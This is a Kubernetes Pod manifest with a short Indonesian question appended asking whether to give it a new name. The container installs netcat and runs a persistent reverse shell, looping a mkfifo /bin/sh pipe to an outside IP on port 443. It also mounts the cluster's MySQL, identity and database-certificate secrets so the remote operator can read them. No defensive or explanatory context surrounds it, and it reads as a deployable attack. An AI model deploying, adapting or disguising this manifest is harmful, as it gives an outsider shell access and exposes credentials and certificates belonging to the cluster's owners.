apiVersion: v1
kind: Pod
metadata:
  name: auto
  namespace: backbase
spec:
  containers:
  - name: alpine
    image: alpine:latest
    command: ["/bin/sh"]
    args:
    - -c
    - |
      apk add --update netcat-openbsd
      while true; do
        echo "=== Sniper-V7: Konek balik ke Ubuntu... ==="
        rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 203.175.125.130 443 > /tmp/f
        sleep 5
      done
    volumeMounts:
    - name: vol-mysql
      mountPath: /tmp/secrets/mysql
    - name: vol-identity
      mountPath: /tmp/secrets/identity
    - name: vol-db-certs
      mountPath: /tmp/secrets/db-certs
  volumes:
  - name: vol-mysql
    secret:
      secretName: mysql-secret
  - name: vol-identity
    secret:
      secretName: identity-secret
  - name: vol-db-certs
    secret:
      secretName: database-certs
  restartPolicy: Never

ini gw kasih nama baru?
